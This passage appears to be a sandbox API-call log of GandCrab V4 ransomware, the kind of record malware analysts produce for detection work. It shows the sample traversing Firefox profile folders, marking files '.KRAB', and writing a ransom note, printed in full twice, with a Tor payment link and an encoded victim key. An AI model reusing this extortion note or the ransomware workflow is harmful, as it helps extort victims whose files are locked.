[0083.790] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 133 [0083.790] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a08d2ca4dee3d.lock") returned 128 [0083.790] lstrlenW (lpString=".lock") returned 5 [0083.790] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.791] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0083.791] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.791] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.791] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.791] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0083.791] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0083.791] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="idb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb" [0083.791] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\" [0083.792] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0083.792] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.792] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.792] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.792] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.792] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.792] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.793] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\\\KRAB-DECRYPT.txt") returned 126 [0083.793] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7dc [0083.810] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0083.810] WriteFile (in: hFile=0x7dc, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338dba0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338dba0*=0x1f6e, lpOverlapped=0x0) returned 1 [0083.811] CloseHandle (hObject=0x7dc) returned 1 [0083.811] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.813] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.813] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1f, wMilliseconds=0xb)) [0083.813] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.814] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.814] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.814] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a08d2ca4dee3d.lock") returned 132 [0083.814] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7dc [0083.815] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.815] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.815] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\") returned 109 [0083.815] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*" [0083.815] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*", lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 0x1023338 [0083.815] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.815] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0083.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.816] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0083.816] lstrcmpW (lpString1="2918063365piupsah.files", lpString2=".") returned 1 [0083.816] lstrcmpW (lpString1="2918063365piupsah.files", lpString2="..") returned 1 [0083.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="2918063365piupsah.files" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0083.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\" [0083.816] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0083.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.817] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.817] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.817] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\\\KRAB-DECRYPT.txt") returned 150 [0083.817] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0083.818] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0083.818] WriteFile (in: hFile=0x420, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338d920, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338d920*=0x1f6e, lpOverlapped=0x0) returned 1 [0083.819] CloseHandle (hObject=0x420) returned 1 [0083.819] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.819] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.819] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1f, wMilliseconds=0xb)) [0083.820] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.820] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.820] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.821] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a08d2ca4dee3d.lock") returned 156 [0083.821] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x420 [0083.821] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.821] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\") returned 133 [0083.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*" [0083.822] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*", lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 0x1023238 [0083.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.822] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0083.822] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.822] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.822] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0083.822] lstrcmpW 